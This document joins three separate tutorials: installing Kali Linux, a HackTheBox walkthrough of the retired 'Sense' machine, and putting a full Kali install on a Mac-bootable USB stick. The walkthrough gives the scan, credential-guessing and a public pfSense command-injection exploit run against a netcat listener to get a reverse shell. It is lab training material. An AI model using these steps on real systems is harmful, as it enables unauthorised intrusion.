It’s basically an ethical hacker's dream operating system, because it has most of the tools you'll ever need built-in. From Metasploit to JohntheRipper to the one and only Aircrack-ng, this OS has it all.

But enough of the history lesson. Let’s jump right in and learn how to install Kali Linux on your computer.

Requirements

Before we carry on, you should know that this is the process for installing on the bare system itself and you should do this with extreme caution.

If you wish to dual boot your machine, you will need to partition your hard drive to give Kali at least 20 GB of hard disk space and then install it on that partition.

Now you are going to need some ingredients for this masterpiece:

1. A Computer (Minimum Requirements: 20GB Hard Disk space, 2GB RAM, Intel Core i3 or AMD E1 equivalent)
2. A USB stick (6 GB or more)
3. A Kali .iso file
4. Rufus (To create a bootable drive)
5. A really cool head (Trust me, you’ll need it 🥶)

How to Install Kali Linux on Your Computer – Step by Step

Step 1: Download the iso file

Go to kali.org and hit the download button.

The Kali Homepage | Credit: kali.org

What you're trying to get is an iso file, which is just a way of packaging software. Operating systems are usually packed like this (but also malicious software, so be careful where you get them💀).

Here you are given a lot of options, but go for the ‘Bare Metal’. There are options for 64-bit, 32-bit, and Apple M1 here (though I have no clue why the last one exists). Choose the tab applicable to your system, and download the Installer. For torrent lovers, the torrent is also available.

The Installer option | Credit: kali.org

Step 2: Create a bootable drive

You can download Rufus from rufus.ie (Rufus 3.18 as at the time of writing). In order to make the stick bootable, we are going to run Rufus and make a few changes.

Connect the stick and select it under the ‘Device’ options. Under ‘Boot selection’ select your newly downloaded Kali iso file. Now for the tricky part.

The Rufus Software | Credit: Mercury

Before we proceed, a quick lesson: a partition scheme/table is the format in which a hard disk saves data. Think of it like your video files saved in .mp4 or .mkv – they are both videos but different formats.

Most computers have one of the following formats: GPT (GUID Partition Table) or MBR (Master Boot Record). You may not be able to boot your drive if you pick the wrong option here.

Summary of it all: Pick the MBR option if the computer is old or using a legacy BIOS. Pick GPT if it is a newer computer and using a UEFI BIOS. If the drive doesn’t show up in the boot menu, change to the other option and try again.

You could also go to the advanced drive properties and check the box with ‘Add fixes for old BIOSes’. This should make the drive more compatible with your computer if it is a very old one. And by old, I mean ancient 👴.

How to prepare the USB stick | Credit: Mercury

Back to easier ground now, you can leave the default format options. Hit the Start Button and wait for the image to be written to the stick (This takes some time so, relax 😌).

Step 3: Access the Kali Installer Menu

To boot the computer from the new Kali USB stick, you’ll need to disable secure boot if it is enabled in the BIOS settings.

You may need to do a little research into how to access your BIOS and boot menu. It usually involves spamming (continuously pressing) a key on your keyboard when the computer starts to boot.

As mentioned before, if you are dual booting, take note of the partition size you made for Kali so you don’t overwrite your other OS (been there, done that 😢).

A Legacy BIOS | Credit: VMware

After disabling secure boot, we can finally boot to the drive. At startup, you’ll have to access the boot menu and then choose the stick you just made. You should be welcomed with the Kali Installer Menu.

The Kali Installer Menu | Credit: Mercury

Note: You can also edit the boot menu configuration in the BIOS menu, but that is permanent and may need to be changed post-installation. It is usually preferred to find a way to access the boot menu when starting up the computer, as this will only be a temporary configuration.

The installer menu only allows the keyboard for input so you’ll have to use the arrow keys, Enter, and Esc to navigate it.

Step 4: Begin the installation

Select graphical install, and you can now use your mouse. Select your preferred language, region, and keyboard layout in the following menus:

Language Menu | Credit: Mercury

Region Menu | Credit: Mercury

You computer will attempt to make some network configurations, but you can easily skip that as it won’t be needed for an offline install.

Fill in a hostname as this will identify your computer on a public network. You can skip the domain name part as this isn’t necessary. Next, type in your full name for your new user account.

Full Name setup | Credit: Mercury

Quick lesson: On the terminal, Linux allows you to send and receive emails with commands. However, Gmail and Yahoo make sending a lot easier these days. You may never have to use this feature in your lifetime.

Next type, in the username for your account (This could be your hacker alias 😎).

Username setup | Credit: Mercury

Choose a strong password/passphrase to input in the next menu.

Password setup | Credit: Mercury

Select your time zone. This is important as it could affect your network configurations post-installation.

Time zone setup | Credit:

Step 5: Set up the storage

Next would be to select the partitioning method. Now for the cool head mentioned earlier. If you want to format the entire hard drive for Kali, the Guided options will be best.

LVM (Logic Volume Management) is a feature that allows you to have relatively flexible partitions. This means that you can extend, shrink or even merge partitions while the OS is being run. It's a pretty nifty feature.

The encrypted LVM feature keeps your data safe if someone unauthorized gets access to your hard drive. Just note that there is a trade-off here: your hard drive will tend to be slower than if it wasn’t encrypted. So most people go with the ‘Guided -use entire disk’ option.

Partitioning method setup | Credit: Mercury

If you are dual-booting, though, you will need to choose the manual option and make the necessary configurations. I’ll go with the use entire disk option here.

Choose the hard drive you want to install Kali on. I’m using a virtual machine so my only option is a small 21 GB drive.

Hard Disk selection | Credit: Mercury

Choose how you want your files to be partitioned. Each option differs by separating certain important directories in separate partitions (More on that in a later post).

Partitioning Scheme | Credit: Mercury

Finish up the partitioning changes.

Partition changes info | Credit: Mercury

Select ‘Yes’ to write the changes to the disk.

Partition Changes verification | Credit: Mercury

Step 5: Chose software and a desktop look

Now, choose the software you wish to install. Check the desktop environment and collection of tools options, as these will help you avoid having to install a lot of things later.

Desktop environments are basically the way the desktop looks to the user. Kali offers Xfce (most common), Gnome, and KDE. I’m a sucker for Gnome so I went with that option. You can still install all three and later configure your computer to choose the one you’d like.

Software Installation Menu | Credit: Mercury

You can check the sixth box to install the top 10 most popular tools on Kali. These are:

1. Aircrack-ng
2. Burpsuite
3. Crackmapexec
4. Hydra
5. Johntheripper (jtr)
6. Metasploit
7. Nmap (Network Mapper)
8. Responder
9. Sqlmap
10. Wireshark

As a hacker, you’re definitely going to need one of these sooner or later, so it’s best if you check that box. You can check the ‘default — recommended tools’ box if you want a whole bunch of tools on your system, but note that this will take a lot of time and space. Hit continue and wait.

Quick tip: It is generally recommended that you only have the tools you absolutely need on your computer. This is because additional tools could slow your computer down, you could waste data updating tools you never use, and you are likely to be more vulnerable if there is an active exploit on the loose.

Step 6: Install the GRUB bootloader

The GRUB boot loader is a piece of software that allows you to pick which OS to boot from when the computer starts up. For both single boot readers and dual boot readers, the best option here is ‘Yes’.

Grub Bootloader setup | Credit: Mercury

Select the your hard drive.

Grub Bootloader setup | Credit: Mercury

Mission Accomplished 🎉🥂. You have successfully installed your Kali Linux OS. Hit continue to clean up and reboot your computer.

Grub Bootloader setup | Credit: Mercury

Note: If you performed dual boot, you may need to change the boot menu to load Kali first before Windows so you have the option of choosing which OS to use.

Once booted up, your screen should be like the one below.

Login screen | Credit: Mercury

If you installed the xfce desktop environment, you will have to put in your username, enter your password, and you should have a nice looking desktop.

Kali Linux Desktop | Credit: Mercury

Conclusion

Alright so let's do a quick recap of what we did:

1. Downloaded the iso file
2. Created a bootable drive
3. Accessed the Kali Installer Menu
4. Began the installation
5. Set up the Storage
6. Installed the GRUB bootloader

And finally, enjoy your new OS. Happy hacking! 🙃

Helpful Resources

1. Kali website: kali.org
2. You can read about the difference between MBR and GPT in this freeCodeCamp article.
3. Here's an article from Kali Linux about how to change your desktop environment

Acknowledgements

Thanks to Chinaza Nwukwa, Holumidey Mercy, Georgina Awani, and my family for the inspiration, support and knowledge used to put this article together. You’re the real MVPs.

HackTheBox is an online hacking platform that allows you to test and practice your penetration testing skills.

It contains several vulnerable labs that are constantly updated. Some of them simulate real-world scenarios and some of them lean more towards a Capture The Flag (CTF) style of challenge.

Note: Only write-ups of retired HTB machines are allowed.

Prerequisites

To get the most out of this walkthrough, you'll need the following:

• HackTheBox VIP subscription.
• Kali Linux operating system.
• Basic bruteforcing knowledge.

Machine Information

Name: Sense

Ip Address: 10.10.10.60

Operating System: FreeBSD

Fasten your seat belts, everyone – we are going for a ride!

Step 1 – Do Some Reconnaissance

Reconnaissance is the process of gathering as much information about a target system as possible, and it is usually the first step toward any hack.

Let's start by running an Nmap scan to gather information about the open ports and services running on this machine by running the following command:

nmap -A -T4 -p- 10.10.10.60

Here's the result:

nmap -A -T4 -p- 10.10.10.60
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-08 05:23 EST
Nmap scan report for 10.10.10.60
Host is up (0.36s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
443/tcp open  ssl/https?
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after:  2023-04-06T19:21:35
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1561.11 seconds

From the scan result we can that there are 2 open ports:

• Port 80 - Hyper Text Transfer Protocol (HTTP)
• Port 443 - Hyper Text Transfer Protocol Secured (HTTPS)

Step 2 – Visit the IP Address

Now let's visit the IP address in a browser.

sense login page

We get a pfsense login page. The default credential for pfsense is admin/pfsense. Unfortunately, these credentials didn't work.

Step 3 – Use Directory Brute Force

You use directory brute force to find hidden directories on a web application.

Now, let's perform a directory brute force using dirbuster.

dirbuster

dirbuster gave us a couple of interesting things:

• Pages with response code of 200.
• A changelog-txt file.
• A system-user-txt file.

changelog-txt and system-user-txt look super juicy, so let's see if we can view their content.

To read the content of this file, we type 10.10.10.60/changelog.txt in our browser.

changelog.txt contains the following:

changelog.txt file

To read the content of this file, we type 10.10.10.60/system-users.txt in our browser.

system-users.txt contains the following:

system-user.txt file

Step 4 – Try to Login

system-users.txt contains a username "Rohit" and a password "company defaults", which doesn't look like a password. What if company defaults = pfsense default password? Let's try it:

• username: Rohit
• pasword: pfsense

dashboard

We get redirected to Rohit's dashboard. Let's click around to see if we can get juicy information or a version number.

The admin page contains a version number

version number

Step 5 – Fire the Exploit

Now that we have a version number, let's use searchsploit to check if there's any known vulnerability on pfsense 2.1.3.

Searchsploit is an Exploit-DB command-line search tool for ExploitDB, an exploits archive.

Searchsploit comes preinstalled in Kali. Now let's run the following command in our terminal:

searchsploit pfsense

searchsploit result

Now that we know this version is vulnerable to a Command Injection attack, let's try to exploit it.

Command injection is a web security vulnerability that allows an attacker to execute arbitrary OS commands on an application server, ultimately compromising the application and its data. This happens when unsanitized user input is passed through an application.

Searchsploit provides us with a Python exploit, so let's try it out.

Before firing this exploit, we need to setup a Netcat listener.

Netcat is a network utility program with the listener being one of its features. The listener allows you to listen on open ports, create reverse shells, and send data or files over a network.

nc -lnvp 9001

Next, we fire our exploit by running the following command:

python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.12 --lport 9001 --username rohit --password pfsense

Boom! We got a shell:

shell

Step 6 – Find the user-flag

Our shell is not a PTY shell, meaning there are specific commands we can't run. However, let's see if we can grab any flag with our current shell.

Let's move to the rohit directory and see what we can find.

user flag

Yayyyyyyy we got our user flag!

Step 7 – Find the root-flag

What if the root flag is available to us without needing privilege escalation? Let's see.

Privilege escalation is an attack whereby a user gets elevated access to a system beyond what is intended.

Let's move to the root directory and see what we can find.

root flag

Booooom! We have successfully rooted this machine.

Conclusion

We were able to root this machine because it was vulnerable to Command Injection attack. Below are some of the ways you can prevent this vulnerability:

• Sanitize user input.
• Avoid calling OS commands directly.
• Patch and update application often.

This tutorial is for everyone who wants a USB stick with a full Kali installation to use with your Mac(s). This is not intended to perform a Live Kali installation with persistence.

The problem when you perform a Kali installation on a USB stick is that Kali partitions the disk with the VFAT file system. Mac OS only recognizes HFS+ partitions along with some files needed for it.

So, you need:

• Your Mac
• A USB stick with Kali ISO installer
• A target USB stick, SD card or an SSD external drive where you’re going to install Kali (16GB and USB 3.0 recommended)

This tutorial was heavily inspired by this tutorial with proper fixes for Kali. https://medium.com/@mmiglier/ubuntu-installation-on-usb-stick-with-pure-efi-boot-mac-compatible-469ad33645c9

USB Live installation

First of all, install Kali on a USB stick by following this tutorial. I’m not gonna bother you on how to proceed on this step, but start here:

$ sudo dd if={KALI_ISO.iso} of=/dev/{USB} bs=1m

When you’re ready, reboot your Mac. Insert both your USB sticks, then press ALT and select the EFI boot to start the Live installer.

Kali installer will ask you different questions about your timezone and keyboard layout.

Proceed until it asks you to partition disks, here select: Manual. Then select your USB target drive (where you want to install Kali). You can recognize by various factors, for example by its size. Click Continue: this will partition your drive.

Now, back again to the same screen and select the FREE SPACE under the USB target drive. Click Continue and select Automatically partition the free space. Follow the recommended option. Then click on Finish partitioning and write the change to disk.

The installation process now will copy data to disk. Wait until it finishes (this is gonna take ~30 minutes).

Boot from GRUB Live

Once finished, your Mac will reboot and you have to press ALT again. Select EFI boot again.

What we have to do now is to load our installed Kali system via Live GRUB, because our installed system doesn’t have a recognizable boot-loader by MacOS.

Once GRUB is loaded, press c to get the GRUB command-line-interface.

Now you have to understand in which HD is your Kali installation. To do this, when GRUB cli is loaded, type ls; eject your USB stick and type ls again.

grub> ls
(memdisk) (hd0) (hd1) (hd1,gpt3) (hd1, gpt2) (hd1,gpt1) ...

You’ll notice that an hd{X} disappeared: that is your drive. Now you have to find your gpt. Probably it’s the gpt2, but just to be sure, type:

grub> ls (hdX,gpt2)/boot/grub
unicode.pf2 ...

If the command says unicode.. it’s the correct gpt; try other gpts otherwise. Now find your UUID of the partition, and annotate it.

grub> ls -l (hdX},gpt{X})
        Partition hd2,gpt2: Filesystem type ext* 〈...snip...〉 UUID e86c20b9-83e1-447d-a3be-d1ddaad6c4c6 - Partition start at [...]

Now we cant set the parameters to GRUB to boot (use the tab key to use autocomplete):

grub> set root=(hd{X},gpt{X})
grub> linux /boot/vmlinuz〈...tab here!...〉.efi.signed root=UUID=〈the UUID〉
grub> initrd /boot/initrd〈...tab here!...〉
grub> boot

This should boot your Full Kali Installation using the Live GRUB. You could differentiate from Live environment by the password it recognizes during the login process.

Fixing the EFI partition

Once you’re logged in in your Kali installation, open the Terminal and type:

$ fdisk -l

and find your drive.

Now, open gdisk (installed by default on Kali) to partition the drive (be very careful here):

$ gdisk /dev/sd{X}
GPT fdisk (gdisk) version 1.0.1

Partition table scan:
  MBR: hybrid
  BSD: not present
  APM: not present
  GPT: present

Found valid GPT with hybrid MBR; using GPT.

Command (? for help):

Print the partition table and confirm that the first partition has type EF00:

Command (? for help): p
Disk /dev/sdd: ...

[...]

Number  Start (sector)  End (sector)  Size     Code   Name
   1         2048         1050623  512.0 MiB   EF00   EFI System Partition

[...]

Now we have to:

• delete that EF00 partition
• create a new HFS+ once in its place

Command (? for help): d
Partition number (1-3): 1

Command (? for help): n
Partition number (1-128, default 1): 1

Just leave defaults values in the sector phase

Current type is 'Linux filesystem'
Hex code or GUID (L to show codes, Enter = 8300): AF00
Changed type of partition to 'Apple HFS/HFS+'

Command (? for help): w

Final checks complete. About to write GPT data. THIS WILL OVERWRITE EXISTING
PARTITIONS!!

Do you want to proceed? (Y/N): Y
OK; writing new GUID partition table (GPT) to /dev/sdd.
Warning: The kernel is still using the old partition table.
The new table will be used at the next reboot.
The operation has completed successfully.

Now we have an unformatted HFS+ partition. To format, we need some tools; but to obtain these tools we need to add the Debian source-list to apt.

$ echo "deb http://ftp.debian.org/debian unstable main contrib non-free" > /etc/apt/sources.list.d/debian.list
$ apt update
$ apt install hfsprogs

We can format that partition:

$ mkfs.hfsplus /dev/sd{X}1 -v Kali
Initialized /dev/sd{X}1 as a 512 MB HFS Plus volume

Now we have to edit the /etc/fstab file:

$ gedit /etc/fstab

This will launch Gedit. In this file, localize these lines:

# /boot/efi was on /dev/sd{X}1 during installation
UUID={XXXXXXX} /boot/efi vfat defaults 0 1

and delete them.

Now, unmount the boot partition, localizing it using:

$ mount | grep /boot/efi
/dev/sd{Y}1 on /boot/efi ...
$ umount /dev/sd{Y}1

Then run this to add the necessary entries to your fstab file:

$ echo "UUID=$(blkid -o value -s UUID /dev/sd{X}1) /boot/efi auto defaults 0 0" >> /etc/fstab

Now we have to reinstall GRUB so it can use the newly formatted HFS+ partition for its EFI data:

$ mkdir -p /boot/efi/EFI/Kali

$ echo "This file is required for booting" > /boot/efi/EFI/Kali/mach_kernel
$ echo "This file is required for booting" > /boot/efi/mach_kernel

$ grub-install --target x86_64-efi --boot-directory=/boot --efi-directory=/boot/efi --bootloader-id=Kali

We then need to “bless” the bootloader code, so that the Mac bootloader will boot it. To do that we need hfsbless binary that is not available via apt. No problem, just clone the repository and build:

$ cd /root
$ git clone https://github.com/detly/mactel-boot
$ cd mactel-boot
$ make

Then bless:

./hfs-bless /boot/efi/EFI/Kali/System/Library/CoreServices/boot.efi

The final step is to create the grub configuration:

$ sed -i 's/GRUB_HIDDEN/#GRUB_HIDDEN/g' /etc/default/grub
$ sed -i 's/GRUB_TIMEOUT=10/GRUB_TIMEOUT=0.1/' /etc/default/grub
$ grub-mkconfig -o /boot/grub/grub.cfg

Perfecto! Now reboot and you should see your USB stick in the Mac bootloader by pressing ALT.

Virtualizing the USB via Virtualbox

If you ever need to boot this USB stick via Virtualbox (on Mac OSX), there is a simple trick to do that.

First of all, you’ve to create a VMDK disk that points to the sectors of your USB stick. So, let’s identify that disk:

$ diskutil list
/dev/disk0 (internal):
   #:                       TYPE NAME                    SIZE       IDENTIFIER
   0:      GUID_partition_scheme                         500.3 GB   disk0
   1:                        EFI EFI                     314.6 MB   disk0s1
   2:                 Apple_APFS Container disk1         499.3 GB   disk0s2

/dev/disk1 (synthesized):
   #:                       TYPE NAME                    SIZE       IDENTIFIER
   0:      APFS Container Scheme -                      +499.3 GB   disk1
                                 Physical Store disk0s2
   1:                APFS Volume Macintosh HD            222.0 GB   disk1s1
   2:                APFS Volume Preboot                 22.4 MB    disk1s2
   3:                APFS Volume Recovery                519.9 MB   disk1s3
   4:                APFS Volume VM                      3.2 GB     disk1s4

/dev/disk3 (external, physical):
   #:                       TYPE NAME                    SIZE       IDENTIFIER
   0:      GUID_partition_scheme                        *32.0 GB    disk3

In our case, it is /dev/disk3. Let’s unmount before proceeding:

$ diskutil unmountDisk /dev/disk{X}

With VirtualBox installed, run:

$ sudo VBoxManage internalcommands createrawvmdk -filename ~/Kali.vmdk -rawdisk /dev/disk{X}
$ chmod 777 ~/Kali.vmdk
$ chmod 777 /dev/disk{X}

Perfecto. Now, run Virtualbox UI and create a new machine with the following settings:

When VirtualBox asks you for a disk, let’s point to that VMDK created before:

Before starting up the machine, let’s go to Settings and adjust your process counts, video and memory.

The important things are to set Enable EFI under System > Motherboard.

This will allow you to boot via EFI. Now start the virtual machine and immediately press F12.

Select Boot Maintenance Manager:

Select Boot from file:

Then select {SATA_DRIVE} > EFI > Kali > System > Library > CoreServices > boot.efi

And, voilà:

Stay tuned :)